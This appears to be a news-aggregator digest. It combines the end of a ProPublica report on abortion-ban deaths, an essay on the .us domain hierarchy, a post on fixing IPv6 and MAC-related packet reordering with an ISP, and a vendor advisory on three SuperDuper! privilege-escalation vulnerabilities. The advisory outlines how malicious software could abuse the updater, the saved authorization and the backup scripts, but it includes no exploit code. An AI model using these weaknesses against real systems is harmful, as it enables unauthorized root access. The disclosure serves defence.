Dr. Jessica Tarleton, an OB-GYN who provides abortions in South Carolina, recalled how much changed at her hospital when the state’s ban was put in place: OB-GYNs who want to provide an abortion to a patient with a health risk now need to get a maternal-fetal medicine specialist to explicitly write in the chart that it is necessary, in compliance with the law. Not many doctors are willing to do so.

“Some people were not because of their personal beliefs, and some because they didn’t want to be involved in any kind of potential legal actions,” Tarleton said. “They didn’t want their opinion to have anything to do with a patient getting an abortion or not.”

Recently, for example, Cristina Nuñez sued two hospitals in El Paso for their inaction in her care in 2023. She had diabetes, uncontrolled blood pressure and end-stage kidney disease when she learned she was unexpectedly pregnant at 36. Doctors wrote in her medical record that “she needs termination based on threat to maternal life or health,” but Nuñez alleged that one hospital failed to find an anesthesiologist willing to participate. She remained pregnant for weeks, even as blood clots turned her right arm black, until an advocacy organization threatened legal action and she was able to obtain an abortion. The lawsuit is ongoing.

This year, Texas Republicans passed legislation with minor amendments to their ban after ProPublica reported the deaths of three miscarrying women who did not receive critical abortion care during emergencies. In the updated law, an emergency still needs to be “life-threatening” to qualify for an abortion, but it no longer needs to be “imminent.” Doctors expect that most hospitals still won’t provide abortions to women like Walker who have dangerous chronic conditions but no certain threat to their lives.

ProPublica asked Sen. Bryan Hughes, the author of Texas’ abortion ban, about how the specific complications Walker faced should be treated by doctors under the amended law. When her pregnancy began, would she be eligible for an abortion due to her health? Would she need to wait for a diagnosis of severe preeclampsia? Is there a reason the law doesn’t include an exception for health risks? ProPublica put the same questions to the 20 state senators who co-wrote the bipartisan amendment.

Only Sen. Carol Alvarado, a Democrat, responded. In her view, the amendment was far too narrow. But, she said, her Republican colleagues defer to the far right of their base and oppose broader exceptions.

“You can’t proclaim to be pro-life, but you’re passing laws that are endangering women and causing death,” she said. “We have to allow for more exceptions.”

Latanya and Pamela in San Antonio

“So You’d Rather Let Somebody Die?”

After Walker died, her family felt bewildered by her medical care. The doctors had assured them that her baby was healthy and she would be fine. The autopsy found that the fetus was indeed healthy, at just under a pound and measuring 9 inches long. But it showed that Walker had  hypertensive cardiovascular disease with preeclampsia, along with an enlarged heart, dangerously full of fluid, and kidney damage — signs that her condition had declined even more than she knew.

In Carson’s mind, the many doctors they saw cast the risks as challenges that would be overcome if his wife followed directions. “She was doing what they told her to do,” he said. He couldn’t understand how no one suggested ending the pregnancy to keep Walker safe. “Nobody said nothing.”

Latanya worried the law played a role. “They didn’t want to offer to end the pregnancy, because the government or someone says you can’t? So you’d rather let somebody die?” she said. “Now we are the ones that have to suffer.”

JJ couldn’t bear to stay in the home where he had found his mom, so he moved in with Latanya. Each day, he scrolls through old videos on the computer so he can hear Walker’s voice.

Latanya does everything she can to support him, but she knows she can’t erase his pain.

She recalls watching JJ steady himself at Walker’s funeral, to see her one last time. Until that point, he hadn’t cried.

When he finally faced the open casket where his mom lay holding her fetus, JJ sank to his knees, overcome. His aunt, uncles, cousins and grandmother gathered around him and rocked him in their arms.

Kavitha Surana has been reporting on changes to reproductive health care access since Roe v. Wade was overturned.

Lizzie Presser is a journalist covering health and social policy.

Mariam Elba and Nick McMillan contributed research.

memories of .us

Lobsters
computer.rip
2025-11-25 05:17:10
Comments...
Original Article

How much do you remember from elementary school? I remember vinyl tile floors, the playground, the teacher sentencing me to standing in the hallway. I had a teacher who was a chess fanatic; he painted a huge chess board in the paved schoolyard and got someone to fabricate big wooden chess pieces. It was enough of an event to get us on the evening news. I remember Run for the Arts, where I tried to talk people into donating money on the theory that I could run, which I could not. I'm about six months into trying to change that and I'm good for a mediocre 5k now, but I don't think that's going to shift the balance on K-12 art funding.

I also remember a domain name: bridger.pps.k12.or.us

I have quipped before that computer science is a field mostly concerned with assigning numbers to things, which is true, but it only takes us so far. Computer scientists also like to organize those numbers into structures, and one of their favorites has always been the tree. The development of wide-area computer networking surfaced a whole set of problems around naming or addressing computer systems that belong to organizations. A wide-area network consists of a set of institutions that manage their own affairs. Each of those institutions may be made up of departments that manage their own affairs. A tree seemed a natural fit. Even the "low level" IP addresses, in the days of "classful" addressing, were a straightforward hierarchy: each dot separated a different level of the tree, a different step in an organizational hierarchy.

The first large computer networks, including those that would become the Internet, initially relied on manually building lists of machines by name. By the time the Domain Name System was developed, this had already become cumbersome. The rapid growth of the internet was hard to keep up with, and besides, why did any one central entity---Jon Postel or whoever---even care about the names of all of the computers at Georgia Tech? Like IP addressing, DNS was designed as a hierarchy with delegated control. A registrant obtains a name in the hierarchy, say gatech.edu, and everything "under" that name is within the control, and responsibility, of the registrant. This arrangement is convenient for both the DNS administrator, which was a single organization even after the days of Postel, and for registrants.

We still use the same approach today... mostly. The meanings of levels of the hierarchy have ossified. Technically speaking, the top of the DNS tree, the DNS root, is a null label referenced by a trailing dot. It's analogous to the '/' at the beginning of POSIX file paths. "gatech.edu" really should be written as "gatech.edu." to make it absolute rather than relative, but since resolution of relative URLs almost always recurses to the top of the tree, the trailing dot is "optional" enough that it is now almost always omitted. The analogy to POSIX file paths raises an interesting point: domain names are backwards. The 'root' is at the end, rather than at the beginning, or in other words, they run from least significant to most significant, rather than most significant to least significant. That's just... one of those things, you know? In the early days one wasn't obviously better than the other, people wrote hierarchies out both ways, and as the dust settled the left-to-right convention mostly prevailed but right-to-left hung around in some protocols. If you've ever dealt with endianness, this is just one of those things about computers that you have to accept: we cannot agree on which way around to write things.
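To make that concrete, here is a minimal Python sketch of my own (the function names are mine, not anything from the DNS specs): it appends the root label to a "relative" name and then lists the labels starting from the root, which makes the least-significant-first writing order easy to see.

def to_absolute(name: str) -> str:
    """Append the trailing dot that names the DNS root, if it is missing."""
    return name if name.endswith(".") else name + "."

def labels_from_root(name: str) -> list[str]:
    """Return the labels ordered from the root down (most significant first)."""
    # "gatech.edu." splits into ["gatech", "edu", ""]; the empty string at the
    # end is the root label, so reversing the list puts the root at the front.
    return list(reversed(to_absolute(name).split(".")))

print(to_absolute("gatech.edu"))                  # gatech.edu.
print(labels_from_root("gatech.edu"))             # ['', 'edu', 'gatech']
print(labels_from_root("bridger.pps.k12.or.us"))  # ['', 'us', 'or', 'k12', 'pps', 'bridger']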

Anyway, the analogy to file paths also illustrates the way that DNS has ossified. The highest "real" or non-root component of a domain name is called the top-level domain or TLD, while the component below it is called a second-level domain. In the US, it was long the case that top-level domains were fixed while second-level domains were available for registration. There have always been exceptions in other countries and our modern proliferation of TLDs has changed this somewhat, but it's still pretty much true. When you look at "gatech.edu" you know that "edu" is just a fixed name in the hierarchy, used to organize domain names by organization type, while "gatech" is a name that belongs to a registrant.

Under the second-level name, things get a little vague. We are all familiar with the third-level name "www," which emerged as a convention for web servers and became a practical requirement. Web servers having the name "www" under an organization's domain was such a norm for so many years that hosting a webpage directly at a second-level name came to be called a "naked domain" and had some caveats and complications.

Other than www, though, there are few to no standards for the use of third-level and below names. Larger organizations are more likely to use third-level names for departments, infrastructure operators often have complex hierarchies of names for their equipment, and enterprises the world 'round name their load-balanced webservers "www2," "www3" and up. If you think about it, this situation seems like kind of a failure of the original concept of DNS... we do use the hierarchy, but for the most part it is not intended for human consumption. Users are only expected to remember two names, one of which is a TLD that comes from a relatively constrained set.

The issue is more interesting when we consider geography. For a very long time, TLDs have been split into two categories: global TLDs, or gTLDs, and country-code TLDs, or ccTLDs. ccTLDs reflect the ISO country codes of each country, and are intended for use by those countries, while gTLDs are arbitrary and reflect the fact that DNS was designed in the US. The ".gov" gTLD, for example, is for use by the US government, while the UK is stuck with ".gov.uk". This does seem unfair but it's now very much cemented into the system: for the most part, US entities use gTLDs, while entities in other countries use names under their respective ccTLDs. The ".us" ccTLD exists just as much as all the others, but is obscure enough that my choice to put my personal website under .us (not an ideological decision but simply a result of where a nice form of my name was available) sometimes gets my email address rejected.

Also, a common typo for ".us" is ".su" and that's geopolitically amusing. .su is of course the ccTLD for the Soviet Union, which no longer exists, but the ccTLD lives on in a limited way because it became Structurally Important and difficult to remove, as names and addresses tend to do.

We can easily imagine a world where this historical injustice had been fixed: as the internet became more global, all of our US institutions could have moved under the .us ccTLD. In fact, why not go further? Geographers have long organized political boundaries into a hierarchy. The US is made up of states, each of which has been assigned a two-letter code by the federal government. We have ".us", why not "nm.us"?

The answer, of course, is that we do.

In the modern DNS, all TLDs have been delegated to an organization who administers them. The .us TLD is rightfully administered by the National Telecommunications and Information Administration, on the same basis by which all ccTLDs are delegated to their respective national governments. Being the US government, NTIA has naturally privatized the function through a contract to telecom-industrial-complex giant Neustar. Being a US company, Neustar restructured and sold its DNS-related business to GoDaddy. Being a US company, GoDaddy rose to prominence on the back of infamously tasteless television commercials, and its subsidiary Registry Services LLC now operates our nation's corner of the DNS.

But that's the present---around here, we avoid discussing the present so as to hold crushing depression at bay. Let's turn our minds to June 1993, and the publication of RFC 1480 "The US Domain." To wit:

Even though the original intention was that any educational institution anywhere in the world could be registered under the EDU domain, in practice, it has turned out with few exceptions, only those in the United States have registered under EDU, similarly with COM (for commercial). In other countries, everything is registered under the 2-letter country code, often with some subdivision. For example, in Korea (KR) the second level names are AC for academic community, CO for commercial, GO for government, and RE for research. However, each country may go its own way about organizing its domain, and many have.

Oh, so let's sort it out!

There are no current plans of putting all of the organizational domains EDU, GOV, COM, etc., under US. These name tokens are not used in the US Domain to avoid confusion.

Oh. Oh well.

Currently, only four year colleges and universities are being registered in the EDU domain. All other schools are being registered in the US Domain.

Huh?

RFC 1480 is a very interesting read. It makes passing references to so many facets of DNS history that could easily be their own articles. It also defines a strict, geography-based hierarchy for the .us domain that is a completely different universe from the one in which we now live. For example, we learned above that, in 1993, only four-year institutions were being placed under .edu. What about the community colleges? Well, RFC 1480 has an answer. Central New Mexico Community College would, of course, fall under cnm.cc.nm.us. Well, actually, in 1993 it was called the Technical-Vocational Institute, so it would have been tvi.tec.nm.us. That's right, the RFC describes both "cc" for community colleges and "tec" for technical institutes.

Even more surprising, it describes placing entities under a "locality" such as a city. The examples of localities given are "berkeley.ca.us" and "portland.wa.us", the latter of which betrays an ironic geographical confusion. It then specifies "ci" for city and "co" for county, meaning that the city government of our notional Portland, Washington would be ci.portland.wa.us. Agencies could go under the city government component (the RFC gives the example "Fire-Dept.CI.Los-Angeles.CA.US") while private businesses could be placed directly under the city (e.g. "IBM.Amonk.NY.US"). The examples here reinforce that the idea itself is different from how we use DNS today: The DNS of RFC 1480 is far more hierarchical and far more focused on full names, without abbreviations.

Of course, the concept is not limited to local government. RFC 1480 describes "fed.us" as a suffix for the federal government (the example "dod.fed.us" illustrates that this has not at all happened), and even "General Independent Entities" and "Distributed National Institutes" for those trickier cases.
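To show how mechanical the scheme is, here is a rough Python sketch of my own (the helper names are hypothetical, not from the RFC) that assembles names following the patterns quoted above. DNS is case-insensitive, so the lowercased output is equivalent to the RFC's mixed-case examples.

def _label(part: str) -> str:
    # RFC 1480's examples hyphenate multi-word components ("Fire-Dept", "Los-Angeles").
    return part.replace(" ", "-").lower()

def us_name(*parts: str) -> str:
    """Join name components left to right and hang the result under .us."""
    return ".".join(_label(p) for p in parts) + ".us"

print(us_name("ci", "Portland", "WA"))                  # ci.portland.wa.us
print(us_name("Fire Dept", "ci", "Los Angeles", "CA"))  # fire-dept.ci.los-angeles.ca.us
print(us_name("cnm", "cc", "NM"))                       # cnm.cc.nm.us
print(us_name("dod", "fed"))                            # dod.fed.us ("fed" sits directly under .us)
print(us_name("bridger", "pps", "k12", "OR"))           # bridger.pps.k12.or.us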

We can draw a few lessons from how this proposal compares to our modern day. Back in the 1990s, .gov was limited to the federal government. The thinking was that all government agencies would move into .us, where the hierarchical structure made it easier to delegate management of state and locality subtrees. What actually happened was the opposite: the .us thing never really caught on, and a more straightforward and automated management process made .gov available to state and local governments. The tree has effectively been flattened.

That's not to say that none of these hierarchical names saw use. GoDaddy continues to maintain what they call the "usTLD Locality-Based Structure". At the decision of the relevant level of the hierarchy (e.g. a state), locality-based subdomains of .us can either be delegated to the state or municipality to operate, or operated by GoDaddy itself as the "Delegated Manager." The latter arrangement is far more common, and it's going to stay that way: RFC 1480 names are not dead, but they are on life support. GoDaddy's contract allows them to stop onboarding any additional delegated managers, and they have.

Few of these locality-based names found wide use, and there are even fewer left today. Multnomah County Library once used "multnomah.lib.or.us," which I believe was actually the very first "library" domain name registered. It now silently redirects to "multcolib.org", which we could consider a graceful name only in that the spelling of "Multnomah" is probably not intuitive to those not from the region. As far as I can tell, the University of Oregon and OGI (part of OHSU) were keeping very close tabs on the goings-on of academic DNS, as Oregon entities are conspicuously over-represented in the very early days of RFC 1480 names---behind only California, although Georgia Tech and Trent Heim of former Colorado company XOR both registered enough names to give their states a run for the money.

"co.bergen.nj.us" works, but just gets you a redirect notice page to bergencountynj.gov. It's interesting that this name is actually longer than the RFC 1480 name, but I think most people would agree that bergencountynj.gov is easier to remember. Some of that just comes down to habit, we all know ".gov", but some of it is more fundamental. I don't think that people often understand the hierarchical structure of DNS, at least not intuitively, and that makes "deeply hierarchical" (as GoDaddy calls them) names confusing.

Certainly the RFC 1480 names for school districts produced complaints. They were also by far the most widely adopted. You can pick and choose examples of libraries (.lib.[state].us) and municipal governments that have used RFC 1480 names, but school districts are another world: most school districts that existed at the time have a legacy of using RFC 1480 naming. As one of its many interesting asides, RFC 1480 explains why: the practice of putting school districts under [district].k12.[state].us actually predates RFC 1480. Indeed, the RFC seems to have been written in part to formalize the existing practice. The idea of the k12.[state].us hierarchy originated within IANA in consultation with InterNIC (newly created at the time) and the Federal Networking Council, a now-defunct advisory committee of federal agencies that made a number of important early decisions about internet architecture.

RFC 1480 is actually a revision on the slightly older RFC 1386, which instead of saying that schools were already using the k12 domains, says that "there ought to be a consistent scheme for naming them." It then says that the k12 branch has been "introduced" for that purpose. RFC 1386 is mostly silent on topics other than schools, so I think it was written to document the decision made about schools with other details about the use of locality-based domains left sketchy until the more thorough RFC 1480.

The decision to place "k12" under the state rather than under a municipality or county might seem odd, but the RFC gives a reason. It's not unusual for school districts, even those named after a municipality, to cover a larger area than the municipality itself. Albuquerque Public Schools operates schools in the East Mountains; Portland Public Schools operates schools across multiple counties and beyond city limits. Actually the RFC gives exactly that second one as an example:

For example, the Portland school district in Oregon, is in three or four counties. Each of those counties also has non-Portland districts.

I include that quote mostly because I think it's funny that the authors now know what state Portland is in. When you hear "DNS" you think Jon Postel, at least if you're me, but RFC 1480 was written by Postel along with a less familiar name, Ann Westine Cooper. Cooper was a coworker of Postel at USC, and RFC 1480 very matter-of-factly names the duo of Postel and Cooper as the administrator of the .US TLD. That's interesting considering that almost five years later Postel would become involved in a notable conflict with the federal government over control of DNS---one of the events that precipitated today's eccentric model of public-private DNS governance.

There are other corners of the RFC 1480 scheme that were not contemplated in 1993, and have managed to outlive many of the names that were. Consider, for example, our indigenous nations: these are an exception to the normal political hierarchy of the US. The Navajo Nation, for example, occupies a status that is often described as parallel to a state, but isn't really. Native nations are sovereign, but are also subject to federal law by statute, and subject to state law by various combinations of statute, jurisprudence, and bilateral agreement. I didn't really give any detail there and I probably still got something wrong, such is the complicated legal history and present of Native America. So where would a native sovereign government put their website? They don't fall under the traditional realm of .gov, federal government, nor do they fall under a state-based hierarchy. Well, naturally, the Navajo Nation is found at navajo-nsn.gov.

We can follow the "navajo" part but the "nsn" is odd, unless they spelled "nation" wrong and then abbreviated it, which I've always thought is what it looks like on first glance. No, this domain name is very much an artifact of history. When the problem of sovereign nations came to Postel and Cooper, the solution they adopted was a new affinity group, like "fed" and "k12" and "lib": "nsn", standing for Native Sovereign Nation. Despite being a late comer, nsn.us probably has the most enduring use of any part of the RFC 1480 concept. Dozens of pueblos, tribes, bands, and confederations still use it. squamishtribe.nsn.us, muckleshoot.nsn.us, ctsi.nsn.us, sandiapueblo.nsn.us.

Yet others have moved away... in a curiously "partial" fashion. navajo-nsn.gov as we have seen, but an even more interesting puzzler is tataviam-nsn.us. It's only one character away from a "standardized" NSN affinity group locality domain, but it's so far away. As best I can tell, most of these governments initially adopted "nsn.us" names, which cemented the use of "nsn" in a similar way to "state" or "city" as they appear in many .gov domains to this day. Policies on .gov registration may be a factor as well: the policies around acceptable .gov names seem to have gone through a long period of informality and then changed a number of times. Without having researched it too deeply, I have seen bits and pieces that make me think that at various points NTIA has preferred that .gov domains for non-federal agencies have some kind of qualifier to indicate their "level" in the political hierarchy. In any case, it's a very interesting situation because "native sovereign nation" is not otherwise a common term in US government. It's not like lawyers or lawmakers broadly refer to tribal governments as NSNs; the term is pretty much unique to the domain names.

So what ever happened to locality-based names? RFC 1480 names have fallen out of favor to such an extent as to be considered legacy by many of their users. Most Americans are probably not aware of this name hierarchy at all, despite it ostensibly being the unified approach for this country. In short, it failed to take off, and those sectors that had widely adopted it (such as schools) have since moved away. But why?

As usual, there seem to be a few reasons. The first is user-friendliness. This is, of course, a matter of opinion---but anecdotally, many people seem to find deeply hierarchical domain names confusing. This may be a self-fulfilling prophecy, since the perception that multi-part DNS names are user-hostile means that no one uses them which means that no users are familiar with them. Maybe, in a different world, we could have broken out of that loop. I'm not convinced, though. In RFC 1480, Postel and Cooper argue that a deeper hierarchy is valuable because it allows for more entities to have their "obviously correct" names. That does make sense to me: splitting the tree up into more branches means that there is less name contention within each branch. But, well, I think it might be the kind of logic that is intuitive only to those who work in computing. For the general public, I think long multi-part names quickly become difficult to remember and difficult to type. When you consider the dollar amounts that private companies have put into dictionary word domain names, it's no surprise that government agencies tend to prefer one-level names with full words and simple abbreviations.

I also think that the technology outpaced the need that RFC 1480 was intended to address. The RFC makes it very clear that Postel and Cooper were concerned about the growing size of the internet, and expected the sheer number of organizations going online to make maintenance of the DNS impractical. They correctly predicted the explosion of hosts, but not the corresponding expansion of the DNS bureaucracy. Between the two versions of the .us RFC, DNS operations were contracted to Network Solutions. This began a winding path that led to delegation of DNS zones to various private organizations, most of which fully automated registration and delegation and then federated it via a common provisioning protocol. The size of, say, the .com zone really did expand beyond what DNS's designers had originally anticipated... but it pretty much worked out okay. The mechanics of DNS's maturation probably had a specifically negative effect on adoption of .us, since it was often under a different operator from the "major" domain names and not all "registrars" initially had access.

Besides, the federal government never seems to have been all that on board with the concept. RFC 1480 could be viewed as a casualty of the DNS wars, a largely unexplored path on the branch of DNS futures that involved IANA becoming completely independent of the federal government. That didn't happen. Instead, in 2003 .gov registration was formally opened to municipal, state, and tribal governments. It became federal policy to encourage use of .gov for trust reasons (DNSSEC has only furthered this), and .us began to fall by the wayside.

That's not to say that RFC 1480 names have ever gone away. You can still find many of them in use. state.nm.us doesn't have an A record, but governor.state.nm.us and a bunch of other examples under it do. The internet is littered with these locality-based names, many of them hiding out in smaller agencies and legacy systems. Names are hard to get right, and one of the reasons is that they're very hard to get rid of.
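
Curious readers can spot-check which of these legacy names still resolve with an ordinary DNS lookup. Here is a minimal Python sketch using only the standard library; the host names are just ones mentioned in this article, and the answers will naturally drift over time:

import socket

# RFC 1480-style locality names mentioned above; results will vary over time.
names = [
    "state.nm.us",
    "governor.state.nm.us",
    "co.bergen.nj.us",
    "multnomah.lib.or.us",
]

for name in names:
    try:
        addrs = sorted({info[4][0] for info in socket.getaddrinfo(name, None)})
        print(f"{name}: {', '.join(addrs)}")
    except socket.gaierror:
        print(f"{name}: does not resolve")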

When things are bigger, names have to be longer. There is an argument that with only 8-character names, and in each position allow a-z, 0-9, and -, you get 37**8 = 3,512,479,453,921 or 3.5 trillion possible names. It is a great argument, but how many of us want names like "xs4gp-7q". It is like license plate numbers, sure some people get the name they want on a vanity plate, but a lot more people who want something specific on a vanity plate can't get it because someone else got it first. Structure and longer names also let more people get their "obviously right" name.

You look at Reddit these days and see all these usernames that are two random words and four random numbers, and you see that Postel and Cooper were right. Flat namespaces create a problem, names must either be complex or long, and people don't like it either. What I think they got wrong, at a usability level, is that deep hierarchies still create names that are complex and long. It's a kind of complexity that computer scientists are more comfortable with, but that's little reassurance when you're staring down the barrel of "bridger.pps.k12.or.us".

Hyperoptic: IPv6 and Out-of-Order Packets

Lobsters
blog.zakkemble.net
2025-11-25 02:08:11
Comments...
Original Article

IPv6 Connectivity

It's probably about time that I figured out how to enable IPv6 on my RouterPi and network! At first, configuring dhcpcd was fairly straightforward and IPv6 connectivity worked almost right away. However, it later became intermittent after rebooting the router and checking that everything was still working. For some reason my ISP's (Hyperoptic) upstream router (not the one in my home) had decided to stop responding to Router Solicitation (RS) packets sent by my router.

Router Solicitations (RS) are part of the IPv6 Neighbour Discovery Protocol (NDP) and are how IPv6-enabled devices locate routers on the link, such as the default gateway. When an RS packet is transmitted, IPv6-enabled routers should respond with a Router Advertisement (RA) packet advertising their presence. Routers also transmit RAs at periodic intervals; these are called unsolicited router advertisements.
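
One way to check this behaviour yourself is to hand-craft a Router Solicitation and see whether anything answers. Below is a minimal sketch using the third-party Scapy package (run as root; the interface name eth1 is an assumption, adjust it to your WAN interface), not a polished diagnostic tool:

from scapy.all import IPv6, ICMPv6ND_RS, ICMPv6ND_RA, sr1

WAN_IFACE = "eth1"  # assumed WAN interface name

# Send a Router Solicitation to the all-routers multicast address and wait
# briefly for a Router Advertisement in response.
rs = IPv6(dst="ff02::2") / ICMPv6ND_RS()
reply = sr1(rs, iface=WAN_IFACE, timeout=5, verbose=False)

if reply is not None and reply.haslayer(ICMPv6ND_RA):
    print("Got a Router Advertisement:", reply[ICMPv6ND_RA].summary())
else:
    print("No RA received - the upstream router ignored the solicitation")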

While Hyperoptic's upstream router did not respond to RS packets, it did send unsolicited RA packets roughly every 15 - 30 minutes. In fact, it would send two identical RA packets at the same time - what's going on there?

This meant that after re-plugging the WAN cable or restarting the router, it would:

  • Successfully obtain a DHCPv6 prefix delegation,
  • ...then take up to 30 minutes before receiving an unsolicited RA,
  • ...leaving the network with valid IPv6 addresses but no default route.

This resulted in the network seeming slow and strange, as devices would attempt to connect to websites using IPv6 before giving up and sometimes falling back to IPv4. The same thing also happened with the official home router provided by Hyperoptic.

After some experimentation I found that changing the MAC address of the WAN interface to any other valid address would trigger the ISP's upstream router into sending an unsolicited RA immediately after a new DHCPv6 prefix delegation had been assigned. This only happened once per MAC address change. I verified this by swapping between two routers - the RouterPi and the home router supplied by Hyperoptic. Since they have different MAC addresses, an RA would be sent quickly after DHCPv6 completed, and IPv6 connectivity would work right away. However, re-plugging the same router would once again result in the network appearing broken for a while due to the lack of a router advertisement and missing default IPv6 route.

So, if you're running into this problem while using the Hyperoptic home router, there's not much you can do about it. But if you're running your own custom Linux router, you can use macchanger as a quick workaround:


sudo macchanger -e eth1        # randomise the device-specific bytes of the WAN MAC, keeping the vendor prefix
sudo systemctl restart dhcpcd  # request a fresh DHCPv6 prefix delegation with the new MAC

The WAN cable may have to be unplugged and plugged back in after running the commands, as it seems Hyperoptic only allows one MAC address change per cable plug-in.

Alternatively, since the default gateway address does not seem to change, it's possible to just add the gateway address manually:


sudo ip -6 route replace default via (gateway IPv6 address) dev eth1 metric 2000  # high metric, so a route learned later from an RA takes precedence

This can be automated by creating a dhcpcd hook script that adds the default gateway on the RENEW6 event.

Hyperoptic also does not assign non-temporary addresses ( ia_na ), only prefix delegations ( ia_pd ). Removing ia_na from dhcpcd.conf stops messages like "eth1: DHCPv6 REPLY: No addresses have been assigned" from spamming the logs.

But we're not finished yet!

Out-of-Order Packets

Another small but annoying problem I noticed on the network was random out of order (OOO) packets. There are many reasons why OOO packets can occur, such as network congestion, but these events were happening frequently - even when streaming a 192 kbps MP3 over the gigabit internet connection.

Wireshark screenshot of out of order packets

After a bit of Googling, I came across this Reddit thread :

RFC4448 section 4.6

Packet reordering can happen if a frame has a leading '4' or '6' Destination MAC address, going over a L2VPN PW traversing a LAG (RFC4448 states it's the source MAC, but I have yet to see this be the case).

The first nibble of the Ethernet header is the first character of the destination MAC. Also the first nibble of the IP header is the version. The router incorrectly assumes that if the MAC starts with a '4' it must be an IPv4 packet. If it starts with a '6' it must be an IPv6 packet.

Adding the control word to the PW fixes this because it forces the router to see a '0' rather than '4' or '6' after the MPLS label.

I believe this happens because the MPLS label has no field to indicate the upper layer. For instance IP has the protocol field, Ethernet has the type field, TCP/UDP have port numbers. With MPLS there is no such field, so the router just assumes an IPv4/IPv6 header comes next, but it's really an ethernet header when using PW/L2VPN.

https://tools.ietf.org/html/rfc4448#section-4.6

As it turned out, the MAC address of my RouterPi's WAN interface started with 4 . Changing it to a0:de:ad:bb:ee:ff instantly fixed the out of order packets, hooray!

To make the MAC address permanent, create a file at /etc/systemd/network/01-wan.link containing:


[Match]
MACAddress=(original WAN MAC address)

[Link]
Name=eth1
MACAddress=a0:de:ad:bb:ee:ff

I do wonder how many people could be affected by out of order packets simply because their router's WAN MAC address starts with 4 or 6 , which could be especially troublesome for online gaming. D:

SuperDuper Security Update v3.11

Daring Fireball
www.shirt-pocket.com
2025-11-24 23:35:46
Dave Nanian and Bruce Lacey, at Shirt Pocket: Mistakes are a part of life. They’re not a great part, but when viewed “correctly”, they’re an opportunity. Well, we have three opportunities, brought to our attention by a security researcher. They’re security vulnerabilities that have been in Sup...
Original Article

Mistakes are a part of life.

They're not a great part, but when viewed "correctly", they're an opportunity.

Well, we have three opportunities, brought to our attention by a security researcher. They're security vulnerabilities that have been in SuperDuper! since the very first version, released almost 22 years ago.

Today, we're releasing fixes for the current release (the SuperDuper! v3.20 Beta is already fixed), a discussion of the problems, and the steps users can take to mitigate the issues if they cannot install the update.

We don't know of any bad actors making use of these exploits as of this post.

Mistake #1 (CVE-2025-61228)

Our auto-update mechanism can be hijacked and convinced to install a package that isn't SuperDuper.

Even though we signed and notarized our installer package, Gatekeeper is not checking that notarization when installed by macOS's package installer. As such, the download could be changed, and we'd install that instead. Since the install is being done with escalated privileges, that could allow a malicious 3rd party's program, which you would also have to install, to gain administrator access to your system.

This can only happen if a program running on your system is looking for SuperDuper to perform an update, a real update is presented through legitimate means, and you click Upgrade .

To fix this, we've done three things:

  1. We've put out an update, which you may have seen before reading this post, that explains that the fixed version of SuperDuper, v3.11, should be downloaded and installed directly from the Shirt Pocket web site...and the Upgrade button, at the bottom of the window, should not be pressed.

  2. We've changed our updater to validate the signature and notarization of the install package ourselves before installing the update.

  3. After this announcement, we will not present update notices for any version of SuperDuper prior to v3.11 unless absolutely necessary, and in those cases we will clearly indicate, as we have here, that the user should not click Upgrade . Users who cannot install the update can prevent these notices from appearing by turning off automatic updates in SuperDuper's preferences.

Mistake #2 (CVE-2025-57489)

When the lock in SuperDuper is unlocked to allow execution to occur without having to enter an administrator password, a 3rd party program could make use of our authorization to run something other than a backup with administrator privileges.

Again, this can only happen if you install something that is, itself, malicious. And it's one mechanism of many that could be used by a bad actor to gain "root" access on your system. But this one is due to our error.

To fix it, as above, we've done three things:

  1. In the same update notice, we've instructed people to install SuperDuper v3.11, downloaded directly from the web site.

  2. We've changed our program to validate that the commands being executed with escalated privileges are actually coming from our own, known, sealed, signed source.

  3. Users who cannot run the new version can lock the lock in the main window, which closes the security hole.

While the new SuperDuper v3.11, released today, ensures that all users who could run v3.10 are no longer vulnerable, one problem remains: we cannot fix older versions of SuperDuper. There are versions of SuperDuper available for macOS versions as early as 10.1, and we have no way to rebuild them. On top of that, we cannot "patch" the faulty element, because SuperDuper itself ensures that it's unmodified before running, and would refuse to run at all if patched.

Unfixed versions can be made secure by locking the lock in the main window. However, doing so means scheduled backups will not run: with the lock locked, all backups must be made by manually running SuperDuper.

Mistake #3 (CVE-2025-61229)

User-settable Before/After shell scripts run escalated, with SuperDuper's TCC Full Disk Access permissions. Since those shell scripts are referenced by the settings files for the copy or schedule, a malicious actor could modify those settings to run their own script.

As before, this would require another malicious program to be installed.

To mitigate this vulnerability, in v3.11 we've made two changes:

  1. Before/After shell scripts are forced to run with the user's ID and privileges. Individuals who require alternative execution contexts can do so through normal Unix methods such as suid .

  2. Scripts must be owned by the root user, even when run in the normal user's context. This ensures that any script that would run has been explicitly authorized by an administrative user.

Note that these Before/After scripts are explicitly referenced in the What's going to happen? section of the main window. Users who cannot update to v3.11 are advised to review that information before pressing Copy Now to ensure no unexpected entries are present.

Practical Considerations

People running old versions of macOS, with old versions of SuperDuper, on old Macs, are exposed to many security vulnerabilities, from web pages that can gain escalated privileges due to bugs in Safari or its sandbox, to other errors in the kernel that can do the same. These errors, when found, are fixed, but those fixes are not available to earlier macOS versions. Once a Mac becomes "vintage", or a version of macOS is no longer supported, security updates are no longer provided, and those issues persist.

On a system where we cannot provide a fix, you have to make a judgement call after balancing the risks of this flaw being exploited, in your personal situation, versus the inconvenience of having to manually perform backups. If you do not install malicious programs from sketchy sources after these vulnerabilities have been disclosed, you are at the same level of risk you were at before, especially since you were already at risk from actors who could exploit your unsupported OS without installing another application, such as by simply visiting a web page.

However, if you feel the additional risk is too great, you can lock the lock, set a scheduled reminder via iCal, and perform your backups manually (and, of course, you can, and should, use Time Machine as well).

Arrgh-arrgh-arrgh-arrgh (argh)

This post obviously uses a more serious tone than you may be used to on the blog.

We take security and safety extremely seriously here—if we didn't, we wouldn't have made a backup program—and, to be frank, feel frustrated and ashamed that our program can be exploited to make your system less safe.

We've taken the steps needed to fix the bugs, inform our valued users, registered or not, about the problems, and have explained how to mitigate them on any version of SuperDuper, old or new. As previously mentioned, and as far as we are aware, these vulnerabilities have not been exploited by a bad actor (which does not mean they can't be, of course).

We'd like to thank the anonymous security researcher who brought these bugs to our attention, and for working with us to verify that our fixes have corrected the errors they found.

Finally, we'd like to take this opportunity to apologize to all our users for these bugs. We hate making mistakes. We're truly sorry for these, and will continue to do our best to put out versions of SuperDuper that you can trust as one method, of many, to keep your data safe.

Thanks for reading, and for using SuperDuper. We couldn't continue to do this without you.

--Dave Nanian & Bruce Lacey

This Development-cycle in Cargo: 1.92

Lobsters
blog.rust-lang.org
2025-11-24 22:38:08
Comments...
Original Article

This Development-cycle in Cargo: 1.92

This is a summary of what has been happening around Cargo development for the last 6 weeks which is approximately the merge window for Rust 1.92.

Plugin of the cycle

